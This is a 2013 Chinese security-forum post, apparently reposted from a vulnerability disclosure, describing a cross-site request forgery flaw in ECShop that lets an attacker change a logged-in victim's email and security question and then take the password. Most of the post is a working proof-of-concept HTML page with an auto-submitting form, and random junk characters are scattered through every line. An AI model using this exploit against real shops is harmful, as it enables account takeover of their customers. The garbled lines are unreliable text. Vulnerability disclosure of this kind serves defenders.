找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1911|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:; Y' d4 v" J: q
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
$ L2 p. P- r' v' C0 g8 s* f. C. x, X5 Z- r
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
* I5 d/ L/ `+ `; }4 g6 q6 D4 M
# h0 [5 [$ o% `: T详细说明:3 |& z! v, D! g/ C
利用csrf和xss可以突破官方所说的“障碍”4 N4 y* _2 b/ Y& ]2 e5 V& x9 ]- c
xss版本已经有人说明
0 E0 V& L) y6 D- \  Z这里给出csrf版本
* O( _+ L) r9 J. A) r9 Y; \6 O! l) a7 c$ O0 n4 k
漏洞证明:
6 C" g% D+ u9 ?3 b4 }4 i/ ^<html>' H# o& H+ H/ D, P3 y" B! I
<body>- m( X8 g. y: o" D# S) \
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">0 e/ {+ x3 b' }3 ^( {) s4 n: T
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. ?& J, y' u3 s" ~" i<INPUT TYPE="text" NAME="act" value="act_edit_profile">0 t; ?$ y( ]* w; i
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 X: t8 w* P' _8 ~- _' o<INPUT TYPE="text" NAME="passwd_answer" value="exploit">, d% i2 v* P( O
</body>" l2 U  Q' T9 ?8 g9 w3 v: A+ g
<script>
( ?. ?% h# Z7 N% j& }document.forms[0].submit();
# [$ `% _2 b# q& ?4 J# o+ P</script>6 K  D5 G' X6 u! w+ Q( H
</html>; \" ]: E; G2 @4 X
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失/ B0 R2 b' \" M7 S; I
! v9 |" Z& T$ s, E- S- \# x* |5 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表